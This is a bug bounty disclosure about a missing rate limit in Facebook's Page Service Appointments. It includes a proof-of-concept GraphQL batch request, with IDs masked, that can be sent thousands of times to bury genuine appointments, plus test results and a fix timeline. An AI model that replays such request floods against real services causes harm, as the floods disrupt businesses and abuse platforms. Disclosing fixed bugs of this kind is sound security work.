[Facebook] Disable Service Appointments

 A hacker could have used missing rate limit in setting up Appointments for a Service created by a Page and hide the legit Appointments.

POC -

A Batch GraphQL request going to -

=======================================================================

POST /api/graphqlbatch/?dpr=1 HTTP/1.1

Host: facebook.com

queries={"o0":{"doc_id":"1407026786058467","query_params":{"input":{"actor_id":XXX,"client_mutation_id":"005f85b8-8f4e-4fe5-bc15-4b49dc2f5cd7","page_id":XXX,"action":"request","service_id":"XXX","availability":"Test","consumer_name":null,"general_info":"","more_info":"Test","referrer":"service_menu","referrer_surface":"page","prior_referrer":null,"prior_referrer_surface":null,"session_id":"c1a2ecb170634f5f4194885db84d5fd6"}}}}

=======================================================================

had missing rate limit.

By repeating this request, the genuine Appointments would be hidden for Page owners.

Rate limit evaluation -

We could have sent 4000 requests in just less than 2 minutes and we were not getting blocked after 4001th request. I used almost 5000 POST requests and was not getting blocked.
The response to these requests have an error. But in the UI the requests are being sent successfully. We were not getting silently blocked.

Timeline -

Reported - Monday, October 29, 2018

Triaged - Wednesday, December 5, 2018

Fixed - Wednesday, February 13, 2019 

Rewarded - Monday, February 18, 2019